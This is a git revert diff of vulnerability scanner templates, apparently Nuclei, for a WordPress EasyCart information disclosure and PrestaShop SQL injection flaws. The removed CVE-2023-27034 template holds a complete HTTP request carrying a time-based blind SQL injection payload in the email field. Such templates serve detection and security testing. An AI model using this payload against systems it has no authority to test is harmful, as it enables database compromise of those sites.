Revert "Added/Fixed/Updated XXX Template"

This reverts commit dd08abe04e.

wrong commit message
patch-1
mastercho 2023-08-19 02:15:25 +03:00
parent dd08abe04e
commit cb8cbac9df
3 changed files with 5 additions and 75 deletions

View File

@ -11,20 +11,13 @@ info:
- https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
- https://nvd.nist.gov/vuln/detail/CVE-2014-4942
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail=
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cve-id: CVE-2014-4942
cwe-id: CWE-200
epss-score: 0.01024
cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*
tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
metadata:
max-request: 1
framework: wordpress
vendor: levelfourdevelopment
product: wp-easycart
tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
http:
- method: GET
@ -46,7 +39,7 @@ http:
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
part: body

View File

@ -1,64 +0,0 @@
id: CVE-2023-27034
info:
name: Blind SQL injection vulnerability in Jms Blog
author: MaStErChO
severity: critical
description: |
The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joo masters PrestaShop themes
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
- https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
- https://github.com/advisories/GHSA-7jr7-v6gv-m656
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27034
cwe-id: CWE-89
tags: cve,cve2023,prestashop,prestashop-module,sqli
metadata:
max-request: 1
http:
- raw:
- |
POST /jmsblog/news/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: {{BaseURL}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: {{Hostname}}
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="comment"
555
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="customer_name"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="post_id"
5
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="post_id_comment_reply"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submitComment"
submitComment=
------------YWJkMTQzNDcw--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'

View File

@ -1,4 +1,4 @@
id: prestashop-apmarketplace-sqli
id: prestashop-marketplace-sqli
info:
name: PrestaShop Ap Marketplace SQL Injection
@ -30,4 +30,5 @@ http:
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "PrestaShop")'
condition: and